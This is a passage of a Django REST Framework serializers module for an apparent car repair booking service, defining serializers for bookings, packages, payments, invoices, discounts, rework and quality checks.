BookingPackagePanel.objects.create(booking_package=bp_obj, **bp_panel)\n return bp_obj\n\n def update(self, instance, validated_data):\n booking = instance.booking\n if booking.status.flow_order_num >= 15:\n raise serializers.ValidationError(\"Cannot update package after Work Completed.\")\n bp_panels = validated_data.pop('booking_package_panel',[])\n\n extra = validated_data.get('extra')\n if booking.rework_booking_id is not None and not extra:\n validated_data['part_price'] = 0\n validated_data['material_price'] = 0\n validated_data['labour_price'] = 0\n\n for attr, value in validated_data.items():\n if not isinstance(value, (list,dict)):\n setattr(instance, attr, value)\n\n if instance.package.package.category == Package.CATEGORY_DENT:\n if bp_panels:\n BookingPackagePanel.objects.filter(booking_package=instance).delete()\n for bp_panel in bp_panels:\n extra = bp_panel.get('extra')\n if booking.rework_booking_id is not None and not extra:\n bp_panel['part_price'] = 0\n bp_panel['material_price'] = 0\n bp_panel['labour_price'] = 0\n BookingPackagePanel.objects.create(booking_package=instance,**bp_panel)\n\n return instance\n\n\nclass BookingAddressSerializer(DynamicFieldsModelSerializer):\n address = AddressSerializer(remove_fields=['id'],read_only=True)\n useraddress_id = serializers.IntegerField(write_only=True)\n\n class Meta:\n model = BookingAddress\n fields = ('__all__')\n read_only_fields=('user',)\n\n def create(self, validated_data):\n ba = bookingManager.save_booking_address(validated_data)\n return ba\n\n\nclass BookingCheckpointSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = BookingCheckpoint\n fields = ('__all__')\n depth = 1\n\n\nclass BookingFlagSerializer(serializers.ModelSerializer):\n flag_type = FlagTypeSerializer(read_only=True)\n\n class Meta:\n model = BookingFlag\n fields = '__all__'\n\n def to_internal_value(self, data):\n self.fields['flag_type'] = serializers.PrimaryKeyRelatedField(queryset=FlagType.objects.filter(active=True),\n required=False)\n return super(BookingFlagSerializer, self).to_internal_value(data)\n\n def to_representation(self, obj):\n if self.fields.get('flag_type'):\n self.fields['flag_type'] = FlagTypeSerializer()\n return super(BookingFlagSerializer, self).to_representation(obj)\n\n\nclass BookingBillSerializer(DynamicFieldsModelSerializer):\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'])\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n user = UserSerializer(remove_fields=['city','designation','company_name',\n 'city_id','groups','ops_phone','user_credit',\n 'is_email_verified', 'active_devices',\n 'user_detail','referral'])\n class Meta:\n model = Booking\n fields = ('booking_package','bill_details','id','payment_details','user')\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_old(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n @classmethod\n def setup_eager_loading(cls, queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n queryset = queryset.select_related('status',\n 'ops_status',\n 'user').prefetch_related('booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',\n 'booking_discount',\n 'booking_invoice',\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n tx_type=Payment.TX_TYPE_PAYMENT).order_by('-id'),\n to_attr='payments'\n ),\n 'user__user_credit',\n 'booking_coupon',\n 'booking_coupon__coupon'\n )\n return queryset\n\n\nclass BookingStatusSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = BookingStatus\n fields = ('__all__')\n\n\nclass BookingOpsStatusSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = BookingOpsStatus\n fields = ('__all__')\n\n\nclass PaymentSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Payment\n fields = ('__all__')\n\n\nclass BookingSerializer(serializers.ModelSerializer):\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'booking_package_panel':BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # many=True,\n # required=False)},\n # required=False)\n booking_address = BookingAddressSerializer(many=True, remove_fields=['booking'], required=False)\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n user = serializers.PrimaryKeyRelatedField(read_only=True)\n status = BookingStatusSerializer(read_only=True)\n ops_status = BookingOpsStatusSerializer(read_only=True)\n city = serializers.PrimaryKeyRelatedField(queryset=City.objects.all(), required=False)\n action = serializers.IntegerField(write_only=True,required=False)\n booking_checkpoint = BookingCheckpointSerializer(many=True, remove_fields=['booking'],read_only=True)\n #quoted_price = serializers.DecimalField(max_digits=10,decimal_places=2,read_only=True)\n pickup_driver_details = UserSerializer(read_only=True, source='pickup_driver',\n remove_fields=['groups','user_credit','city','active_devices','user_detail',\n 'referral'])\n drop_driver_details = UserSerializer(read_only=True, source='drop_driver',\n remove_fields=['groups','user_credit','city','active_devices','user_detail',\n 'referral'])\n workshop_manager_details = UserSerializer(read_only=True, source='workshop_manager',\n remove_fields=['groups','user_credit','city','active_devices',\n 'user_detail','referral'])\n user_id = serializers.PrimaryKeyRelatedField(\n queryset=get_user_model().objects.all(), source='user', write_only=True, required=False)\n #payments = serializers.SerializerMethodField()\n booking_rework = serializers.PrimaryKeyRelatedField(read_only=True, many=True)\n workshop_images = serializers.ListField(write_only=True, required=False, child=serializers.DictField())\n eod_message = serializers.SerializerMethodField()\n checked_items = serializers.ListField(child=TestedQualityCheckSerializer(), write_only=True, required=False)\n item_list = serializers.ListField(child=BookingChecklistItemCreateSerializer(),\n write_only=True, required=False)\n reason_text = serializers.CharField(write_only=True, required=False, allow_null=True) # Reason for delay.\n return_reason = ReturnReasonsSerializer()\n booking_flag = BookingFlagSerializer(read_only=True, many=True)\n\n class Meta:\n model = Booking\n exclude = ('followup',)\n #fields = ('booking_package','booking_address','status','booking_bill','user','city','booking_checkpoint','action')\n\n def to_internal_value(self, data):\n self.fields['return_reason'] = serializers.PrimaryKeyRelatedField(queryset=CarReturnReasons.objects.all(),\n required=False)\n return super(BookingSerializer, self).to_internal_value(data)\n\n def to_representation(self, obj):\n self.fields['return_reason'] = ReturnReasonsSerializer()\n self.fields['workshop_asst_mgr'] = UserSerializer(new_fields=['id', 'name', 'ops_phone', 'email'])\n return super(BookingSerializer, self).to_representation(obj)\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_new(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n def get_eod_message(self, obj):\n return bookingManager.get_latest_eod_message(obj)\n\n # def get_payments(self, obj):\n # return paymentManager.get_payments(obj)\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n from django.db.models import F\n queryset = queryset.select_related('status',\n 'city',\n 'ops_status',\n 'pickup_driver',\n 'drop_driver',\n 'workshop_manager',\n 'return_reason',\n 'user'\n ).prefetch_related(\n 'booking_address',\n 'booking_address__address',\n 'booking_checkpoint',\n 'booking_checkpoint__status',\n 'booking_discount',\n 'booking_invoice',\n 'booking_proforma_invoice',\n 'booking_flag',\n 'user__user_credit',\n Prefetch(\n 'user__user_credittrx',\n queryset=CreditTransaction.objects.filter(\n entity=CreditTransaction.ENTITY_BOOKING,\n trans_type=CreditTransaction.TRANSACTION_TYPE_DEBIT,\n )\n ),\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(\n payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='payments'\n ),\n Prefetch(\n \"booking_proforma_invoice__proforma_invoice_payment\",\n queryset=Payment.objects.filter(\n payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='proforma_payments'\n ),\n 'booking_coupon',\n 'booking_coupon__coupon',\n 'booking_rework',\n Prefetch(\n 'message_booking',\n queryset=Messages.objects.filter(\n label=Messages.LABEL_EOD).order_by('-created_at')\n )\n )\n if internal:\n queryset = queryset.prefetch_related('booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',)\n else:\n queryset = queryset.prefetch_related(Prefetch('booking_package',\n queryset=BookingPackage.objects.filter(package__package__internal=False).prefetch_related(\n Prefetch('booking_package_panel',\n queryset=BookingPackagePanel.objects.filter(panel__car_panel__internal=False,\n panel__internal=False).prefetch_related(\n 'panel',\n 'panel__car_panel',\n )\n ),\n 'package',\n 'package__package'),\n ),\n )\n return queryset\n\n def create(self, validated_data):\n return bookingManager.create_booking(validated_data)\n\n def update(self, instance, validated_data):\n return bookingManager.update_booking(instance, validated_data)\n\n def save(self, **kwargs):\n request = self.context['request']\n kwargs['updated_by'] = request.user\n kwargs['device_type'] = request.META.get('HTTP_SOURCE')\n super(BookingSerializer, self).save(**kwargs)\n\n\nclass GetSlotSerializer(serializers.Serializer):\n car_model = serializers.IntegerField(write_only=True, required=False)\n type = serializers.ChoiceField(write_only=True, required=True, choices=BookingAddress.ADDRESS_TYPES)\n is_doorstep = serializers.BooleanField(write_only=True, required=False)\n city = serializers.PrimaryKeyRelatedField(queryset=City.objects.filter(active=True), required=False)\n\n\nclass BookingFollowupSerializer(DynamicFieldsModelSerializer):\n followup = FollowupSerializer(many=True)\n class Meta:\n model = Booking\n fields = ('id','followup','assigned_to','next_followup')\n\n def update(self, instance, validated_data):\n return bookingManager.update_followup(instance, validated_data)\n\n def save(self, **kwargs):\n request = self.context.get('request')\n kwargs['updated_by'] = request.user\n super(BookingFollowupSerializer, self).save(**kwargs)\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n queryset = queryset.prefetch_related(Prefetch(\n 'followup',\n Followup.objects.order_by('-created_at').select_related('updated_by',\n 'result'),\n ))\n return queryset\n\n\nclass InitiatePaymentSerializer(serializers.Serializer):\n payment_type = serializers.ChoiceField(choices=Payment.PAYMENT_TYPES)\n amount = serializers.DecimalField(max_digits=10,decimal_places=2,min_value=0,required=False)\n\n\nclass ProcessPaymentSerializer(serializers.Serializer):\n vendor_id = serializers.CharField()\n payment_id = serializers.IntegerField(required=False)\n net_amount_debit = serializers.DecimalField(max_digits=10, decimal_places=2, min_value=0)\n status = serializers.CharField()\n vendor_status = serializers.CharField(required=False)\n error_message = serializers.CharField(required=False)\n vendor = serializers.ChoiceField(choices=Payment.VENDOR_LIST)\n vendor_tx_data = serializers.CharField(required=False)\n mode = serializers.ChoiceField(choices=Payment.PAYMENT_MODES)\n payment_type = serializers.ChoiceField(choices=Payment.PAYMENT_TYPES, required=False)\n cheque_num = serializers.CharField(max_length=20, required=False)\n cheque_bank = serializers.CharField(max_length=32, required=False)\n tx_type = serializers.ChoiceField(choices=Payment.TX_TYPES, required=False)\n used_credits = serializers.DecimalField(max_digits=10, decimal_places=2, min_value=0, required=False)\n\n\nclass CouponDetailSerializer(serializers.Serializer):\n coupon_code = serializers.CharField()\n\n\nclass DriverBookingSerializer(serializers.ModelSerializer):\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'booking_package_panel': BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # many=True,\n # required=False)},\n # required=False)\n booking_address = BookingAddressSerializer(many=True, remove_fields=['booking'],required=False)\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n user = UserSerializer(read_only=True, remove_fields=['referral'])\n status = BookingStatusSerializer(read_only=True)\n ops_status = BookingOpsStatusSerializer(read_only=True)\n city = serializers.PrimaryKeyRelatedField(queryset=City.objects.all(), required=False)\n action = serializers.IntegerField(write_only=True,required=False)\n pickup_driver_details = UserSerializer(read_only=True, source='pickup_driver',\n new_fields=['name', 'email', 'phone', 'ops_phone'])\n drop_driver_details = UserSerializer(read_only=True, source='drop_driver',\n new_fields=['name', 'email', 'phone', 'ops_phone'])\n workshop_manager_details = UserSerializer(read_only=True, source='workshop_manager',\n new_fields=['name', 'email', 'phone', 'ops_phone'])\n workshop_details = WorkshopSerializer(read_only=True, source='workshop')\n usercar_details = UserCarSerializer(source='usercar', read_only=True, remove_fields=['active_bookings'])\n user_id = serializers.PrimaryKeyRelatedField(\n queryset=get_user_model().objects.all(), source='user', write_only=True, required=False)\n payments = PaymentSerializer(many=True,\n remove_fields=[\n 'tx_data',\n 'tx_type',\n 'payment_for',\n 'vendor',\n 'payment_vendor_id',\n 'refund_vendor_id',\n 'vendor_status',\n 'cheque_num',\n 'cheque_bank'],\n read_only=True)\n\n class Meta:\n model = Booking\n fields = ('__all__')\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_new(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n\n queryset = queryset.select_related('status',\n 'city',\n 'ops_status',\n 'pickup_driver',\n 'drop_driver',\n 'workshop_manager',\n 'workshop',\n 'usercar',\n 'user').prefetch_related('booking_address',\n 'booking_address__address',\n 'booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',\n 'booking_discount',\n 'booking_invoice',\n 'user__user_credit',\n 'user__user_credittrx',\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(\n payment_for=Payment.PAYMENT_FOR_USER\n ).order_by('-id'),\n to_attr='payments'\n ),\n 'booking_coupon'\n )\n\n return queryset\n\n def create(self, validated_data):\n return bookingManager.create_booking(validated_data)\n\n def update(self, instance, validated_data):\n return bookingManager.update_booking(instance, validated_data)\n\n def save(self, **kwargs):\n request = self.context['request']\n kwargs['updated_by'] = request.user\n kwargs['device_type'] = request.META.get('HTTP_SOURCE')\n super(DriverBookingSerializer, self).save(**kwargs)\n\n\nclass BookingImageSerializer(CreateListModelMixin, serializers.ModelSerializer):\n media = serializers.FileField(write_only=True, required=False)\n media_url = serializers.SerializerMethodField()\n image_name = serializers.CharField(write_only=True, required=False)\n size = serializers.IntegerField(write_only=True, required=False)\n content_type = serializers.CharField(write_only=True, required=False)\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n\n class Meta:\n model = BookingImage\n fields = '__all__'\n\n def to_representation(self, obj):\n self.fields['updated_by'] = UserSerializer(\n read_only=True,\n new_fields=['id','name','phone','ops_phone'])\n self.fields['status'] = BookingStatusSerializer(read_only=True)\n self.fields['ops_status'] = BookingOpsStatusSerializer(read_only=True)\n self.fields['panel'] = CarPanelSerializer(new_fields=['id', 'name'], read_only=True)\n return super(BookingImageSerializer, self).to_representation(obj)\n\n def create(self, validated_data):\n return bookingManager.create_booking_image(validated_data)\n\n def get_media_url(self, obj):\n request = self.context['request']\n return bookingManager.get_media_url(request, obj.media)\n\n\nclass BookingDiscountSerializer(serializers.ModelSerializer):\n reason_dd_details = DiscountReasonsSerializer(source='reason_dd',\n read_only=True)\n class Meta:\n model = BookingDiscount\n fields = '__all__'\n\n def create(self, validated_data):\n bd_obj = super(BookingDiscountSerializer, self).create(validated_data)\n booking_invoices = bd_obj.booking.booking_invoice.filter(status__in=[BookingInvoice.INVOICE_STATUS_PENDING,\n BookingInvoice.INVOICE_STATUS_PAID])\n if booking_invoices:\n bookingManager.save_invoice(bd_obj.booking)\n\n send_custom_notification_task.delay('OPS_ADD_DISCOUNT_EMAIL',\n {'booking': bd_obj.booking_id,\n 'labour_discount': bd_obj.labour_discount,\n 'material_discount': bd_obj.material_discount,\n 'part_discount': bd_obj.part_discount,\n 'reason': bd_obj.reason,\n })\n return bd_obj\n\n def update(self, instance, validated_data):\n bd_obj = super(BookingDiscountSerializer, self).update(instance, validated_data)\n booking_invoices = bd_obj.booking.booking_invoice.filter(status__in=[BookingInvoice.INVOICE_STATUS_PENDING,\n BookingInvoice.INVOICE_STATUS_PAID])\n if booking_invoices:\n bookingManager.save_invoice(bd_obj.booking)\n return bd_obj\n\n\nclass BookingCouponSerializer(serializers.ModelSerializer):\n class Meta:\n model = BookingCoupon\n fields = '__all__'\n\n def create(self, validated_data):\n bc_obj = super(BookingCouponSerializer, self).create(validated_data)\n booking_invoices = bc_obj.booking.booking_invoice.filter(status__in=[BookingInvoice.INVOICE_STATUS_PENDING,\n BookingInvoice.INVOICE_STATUS_PAID])\n if booking_invoices:\n bookingManager.save_invoice(bc_obj.booking)\n\n return bc_obj\n\n def update(self, instance, validated_data):\n bc_obj = super(BookingCouponSerializer, self).update(instance, validated_data)\n booking_invoices = bc_obj.booking.booking_invoice.filter(status__in=[BookingInvoice.INVOICE_STATUS_PENDING,\n BookingInvoice.INVOICE_STATUS_PAID])\n if booking_invoices:\n bookingManager.save_invoice(bc_obj.booking)\n return bc_obj\n\n\nclass BookingListSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = Booking\n fields = ('id','usercar','status')\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n return queryset\n\n\nclass BookingBillSerializerV2(serializers.ModelSerializer):\n # ye ek rakshas (complex) code hai.. Please do not touch it without knowledge..\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'package':PackagePriceSerializer(\n # read_only=True,\n # remove_fields=['id', 'city'],\n # change_serializer={\n # 'package':PackageSerializer(\n # new_fields=[\n # 'name', 'category'])}),\n # 'booking_package_panel':BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # change_serializer={'panel_details':\n # CarPanelPriceSerializer(\n # remove_fields=['id',\n # 'type_of_work_val',\n # 'updated_at',\n # 'created_at',\n # 'car_type',\n # 'car_model',\n # 'editable',\n # 'city'],\n # change_serializer={\n # 'car_panel': CarPanelSerializer(new_fields=['name'])\n # },\n # source='panel',\n # read_only=True)},\n # many=True,\n # required=False)},\n # required=False)\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n user = UserSerializer(new_fields=['name','email','phone'])\n payment_gateway = serializers.SerializerMethodField()\n\n class Meta:\n model = Booking\n fields = ('id','booking_package','bill_details','payment_details','usercar','user','payment_gateway')\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_new(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n def get_payment_gateway(self, obj):\n return getattr(settings,'PAYMENT_GATEWAY_TO_USE', 1)\n\n @classmethod\n def setup_eager_loading(cls, queryset):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n\n queryset = queryset.select_related('user').prefetch_related(\n 'booking_discount',\n 'booking_invoice',\n 'booking_proforma_invoice',\n 'user__user_credit',\n 'user__user_credittrx',\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='payments'\n ),\n Prefetch(\n \"booking_proforma_invoice__proforma_invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='proforma_payments'\n ),\n 'booking_coupon',\n 'booking_coupon__coupon'\n )\n queryset = queryset.prefetch_related('booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',)\n return queryset\n\n\nclass BookingCartSerializer(serializers.ModelSerializer):\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'booking_package_panel':BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # many=True,\n # required=False)},\n # required=False)\n bill_details = serializers.SerializerMethodField()\n payment_details = serializers.SerializerMethodField()\n\n class Meta:\n model = Booking\n fields = ('__all__')\n\n def get_bill_details(self, obj):\n return bookingManager.get_bill_details_new(obj)\n\n def get_payment_details(self, obj):\n return paymentManager.get_payment_details(obj)\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n\n queryset = queryset.prefetch_related(\n 'booking_discount',\n 'booking_invoice',\n 'booking_proforma_invoice',\n 'user__user_credit',\n 'user__user_credittrx',\n Prefetch(\n \"booking_invoice__invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='payments'\n ),\n Prefetch(\n \"booking_proforma_invoice__proforma_invoice_payment\",\n queryset=Payment.objects.filter(payment_for=Payment.PAYMENT_FOR_USER,\n ).order_by('-id'),\n to_attr='proforma_payments'\n ),\n 'booking_coupon',\n 'booking_coupon__coupon'\n )\n if internal:\n queryset = queryset.prefetch_related('booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package',)\n else:\n queryset = queryset.prefetch_related(Prefetch('booking_package',\n queryset=BookingPackage.objects.filter(package__package__internal=False).prefetch_related(\n Prefetch('booking_package_panel',\n queryset=BookingPackagePanel.objects.filter(panel__car_panel__internal=False,\n panel__internal=False).prefetch_related(\n 'panel',\n 'panel__car_panel',\n )\n ),\n 'package',\n 'package__package'),\n ),\n )\n return queryset\n\n\nclass BookingFeedbackSerializer(serializers.ModelSerializer):\n class Meta:\n model = BookingFeedback\n fields = '__all__'\n validators = [ObjectUserValidator('booking', 'Booking')]\n\n\nclass BookingCustFeedbackSerializer(serializers.ModelSerializer):\n class Meta:\n model = BookingCustFeedback\n fields = '__all__'\n validators = [ObjectUserValidator('booking', 'Booking')]\n\n def create(self, validated_data):\n booking = validated_data.get('booking')\n instance = BookingCustFeedback.objects.filter(booking=booking).first()\n if instance:\n return super(BookingCustFeedbackSerializer, self).update(instance, validated_data)\n return super(BookingCustFeedbackSerializer,self).create(validated_data)\n\n\nclass EODNoticeSerializer(serializers.Serializer):\n action = serializers.ChoiceField(choices=list(ACTION_DICT.keys()), required=True)\n\n\nclass BookingProformaInvoiceSerializer(DynamicFieldsModelSerializer):\n class Meta:\n model = BookingProformaInvoice\n fields = '__all__'\n validators = [ObjectUserValidator('booking', 'Booking')]\n\n def create(self, validated_data):\n bookingManager.validate_proforma_invoice(validated_data)\n return super(BookingProformaInvoiceSerializer, self).create(validated_data)\n\n def update(self, instance, validated_data):\n return super(BookingProformaInvoiceSerializer, self).update(instance, validated_data)\n\n\nclass SaveEODSerializer(serializers.Serializer):\n message_type = serializers.ChoiceField(choices=Messages.MESSAGE_TYPES, required=True)\n message = serializers.CharField(max_length=4096, required=True)\n action = serializers.ChoiceField(choices=list(ACTION_DICT.keys()), required=False)\n\n\n# class BookingReworkSerializer(serializers.ModelSerializer):\n# booking_package = BookingPackageSerializer(many=True, remove_fields=['booking',],\n# change_serializer={\n# 'booking_package_panel':BookingPackagePanelSerializer(\n# remove_fields=['booking_package'],\n# many=True,\n# read_only=True)},\n# read_only=True)\n#\n# class Meta:\n# model = Booking\n# fields = ('__all__')\n#\n# @classmethod\n# def setup_eager_loading(cls, queryset, internal):\n# \"\"\" Perform necessary eager loading of data. \"\"\"\n#\n# queryset = queryset.prefetch_related('booking_package',\n# 'booking_package__booking_package_panel',\n# 'booking_package__booking_package_panel__panel',\n# 'booking_package__booking_package_panel__panel__car_panel',\n# 'booking_package__package',\n# 'booking_package__package__package',\n# 'booking_package__rework_package',\n# 'booking_package__booking_package_panel__rework_panel')\n# return queryset\n\n\nclass BookingReworkPackagePanelSerializer(ConflictAwareModelSerializer):\n panel_details = BookingPackagePanelSerializer(read_only=True, source='booking_package_panel')\n\n class Meta:\n model = BookingReworkPackagePanel\n fields = '__all__'\n\n def create(self, validated_data):\n booking_package_panel = validated_data.get('booking_package_panel')\n obj = super(BookingReworkPackagePanelSerializer, self).create(validated_data)\n booking_package_panel.rework = True\n booking_package_panel.save()\n return obj\n\n\nclass BookingReworkPackageSerializer(ConflictAwareModelSerializer):\n booking_package_details = BookingPackageSerializer(read_only=True,source='booking_package',\n remove_fields=['booking_package_panel'])\n class Meta:\n model = BookingReworkPackage\n fields = '__all__'\n\n def create(self, validated_data):\n booking_package = validated_data.get('booking_package')\n obj = super(BookingReworkPackageSerializer, self).create(validated_data)\n booking_package.rework = True\n booking_package.save()\n return obj\n\n\nclass WorkshopBookingSerializer(serializers.ModelSerializer):\n usercar_details = UserCarSerializer(source='usercar', read_only=True, remove_fields=['active_bookings'])\n status = BookingStatusSerializer(read_only=True)\n ops_status = BookingOpsStatusSerializer(read_only=True)\n booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],required=False)\n # booking_package = BookingPackageSerializer(many=True, remove_fields=['booking'],\n # change_serializer={\n # 'booking_package_panel': BookingPackagePanelSerializer(\n # remove_fields=['booking_package'],\n # many=True,\n # required=False)},\n # required=False, read_only=True)\n last_updated_since = serializers.SerializerMethodField()\n\n class Meta:\n model = Booking\n fields = ('__all__')\n\n def get_last_updated_since(self, booking):\n # return timezone.now()\n last_rec = booking.history.filter(\n updated_by__groups__name='WorkshopExecutive').order_by('-updated_at').first()\n if last_rec:\n return last_rec.updated_at\n return None\n\n @classmethod\n def setup_eager_loading(cls, queryset, internal):\n \"\"\" Perform necessary eager loading of data. \"\"\"\n\n return queryset.select_related('usercar',\n 'status',\n 'ops_status').prefetch_related(\n 'booking_package',\n 'booking_package__booking_package_panel',\n 'booking_package__booking_package_panel__panel',\n 'booking_package__booking_package_panel__panel__car_panel',\n 'booking_package__package',\n 'booking_package__package__package')\n\n def create(self, validated_data):\n return bookingManager.create_booking(validated_data)\n\n def update(self, instance, validated_data):\n return bookingManager.update_booking(instance, validated_data)\n\n def save(self, **kwargs):\n request = self.context['request']\n kwargs['updated_by'] = request.user\n kwargs['device_type'] = request.META.get('HTTP_SOURCE')\n super(WorkshopBookingSerializer, self).save(**kwargs)\n\n\nclass BookingQualityCheckSerializer(serializers.ModelSerializer):\n quality_check = QualityCheckSerializer(read_only=True)\n\n class Meta:\n model = BookingQualityChecks\n exclude = ('booking',)\n\n\nclass BookingTestedQualityCheckSerializer(serializers.Serializer):\n booking = serializers.PrimaryKeyRelatedField(queryset=Booking.objects.all(), required=True)\n checked_items = serializers.ListField(child=TestedQualityCheckSerializer())\n #qc_image = BookingImageSerializer(required=False)\n\n def create(self, validated_data):\n # :-)\n # if not Booking.objects.filter(id=validated_data.get('booking_id')).exists():\n # raise serializers.ValidationError(\"Invalid Booking Id.\")\n #\n # booking = Booking.objects.get(id=validated_data.get('booking_id'))\n booking = validated_data.get('booking')\n bookingManager.create_qc_checks(booking, validated_data)\n\n\nclass EntityChangeTrackerSerializer(serializers.ModelSerializer):\n delay_reason_details = DelayReasonsSerializer(read_only=True, source='delay_reason')\n updated_by_details = UserSerializer(source='updated_by',\n read_only=True,\n remove_fields=['groups','user_credit','city','active_devices','user_detail',\n 'referral'])\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(), write_only=True,\n queryset=get_user_model().objects.all())\n class Meta:\n model = EntityChangeTracker\n fields = ('__all__')\n\n\nclass TeamAlertSerializer(serializers.ModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n reason_details = TeamAlertReasonSerializer(source='alert_reason', read_only=True,\n new_fields=['reason', 'reason_type'])\n\n class Meta:\n model = TeamAlert\n fields = ('__all__')\n\n\nclass BookingHandoverSerializer(serializers.ModelSerializer):\n item = HandoverItemSerializer(read_only=True)\n\n class Meta:\n model = BookingHandoverItem\n exclude = ('booking',)\n\n\nclass BookingHandoverCreateSerializer(serializers.Serializer):\n booking = serializers.PrimaryKeyRelatedField(queryset=Booking.objects.all(), required=True)\n item_list = serializers.ListField(child=BookingHandoverItemCreateSerializer())\n\n def create(self, validated_data):\n booking = validated_data.get('booking')\n return bookingManager.create_handover_list(booking, validated_data)\n\n\nclass BookingChecklistSerializer(serializers.ModelSerializer):\n item = ChecklistItemSerializer(read_only=True)\n media = MediaSerializer(read_only=True, many=True, new_fields=['media_url'])\n updated_by_details = UserSerializer(source='updated_by',\n read_only=True,\n new_fields=['id', 'name', 'email', 'phone', 'ops_phone'])\n\n class Meta:\n model = BookingChecklist\n exclude = ('booking',)\n\n\nclass BookingChecklistCreateSerializer(serializers.Serializer):\n booking = serializers.PrimaryKeyRelatedField(queryset=Booking.objects.all(), required=True)\n item_list = serializers.ListField(child=BookingChecklistItemCreateSerializer())\n\n class Meta:\n validators = [ObjectUserValidator('booking', 'Booking')]\n\n def create(self, validated_data):\n booking = validated_data.get('booking')\n return bookingManager.create_checklist(booking, validated_data)\n\n\nclass PartQuoteNoteSerializer(DynamicFieldsModelSerializer):\n updated_by = serializers.PrimaryKeyRelatedField(default=serializers.CurrentUserDefault(),\n queryset=get_user_model().objects.all())\n class Meta:\n model = PartQuoteNote\n fields = '__all__'\n\n def to_representation(self, obj):\n self.fields['updated_by'] = UserSerializer(\n read_only=True,\n new_fields=['id', 'name', 'phone', 'ops_phone'])\n return super(PartQuoteNoteSerializer, self).to_representation(obj)\n\n\nclass BookingPartQuoteSerializer(DynamicFieldsModelSerializer):\n notes = PartQuoteNoteSerializer(many=True, required=False)\n\n class Meta:\n model = BookingPartQuote\n fields = '__all__'\n\n def to_representation(self, obj):\n if self.fields.get('vendor'):\n serializer_class = GenericModelSerializer\n serializer_class.Meta.model = PartVendor\n self.fields['vendor'] = serializer_class(new_fields=['id', 'name', 